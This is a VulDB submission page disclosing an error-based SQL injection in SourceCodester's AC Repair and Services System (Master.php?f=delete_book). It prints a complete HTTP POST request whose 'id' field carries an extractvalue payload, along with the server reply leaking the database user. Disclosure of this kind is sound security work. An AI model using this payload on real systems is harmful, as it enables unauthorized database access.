제출 #180827: SourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.php정보

제목	SourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.php
설명	I find sql injection in Sourcecodester Ac Repair And Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html).It is a sql injection in url/classes/Master.php?f=delete_book. POST /php-acrss/classes/Master.php?f=delete_book HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------25039842273186474810708140780 Content-Length: 906 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="fullname" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="email" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="contact" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="address" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="services[]" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="status" 1 -----------------------------25039842273186474810708140780-- And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}".Obviously, there is an error injection vulnerability here due to insufficient filtering of the id parameter.My suggestion for modification is to use mysqli_real_escape_string() to protect controllable ID parameters from malicious exploitation by hackers, resulting in SQL error injection
원천	⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
사용자	fushuling (UID 45488)
제출	2023. 07. 11. PM 05:42 (3 연령 ago)
모더레이션	2023. 07. 13. AM 11:49 (2 days later)
상태	수락
VulDB 항목	234012 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_book 아이디 SQL 주입]
포인트들	20

◂ 이전 개요 다음 ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!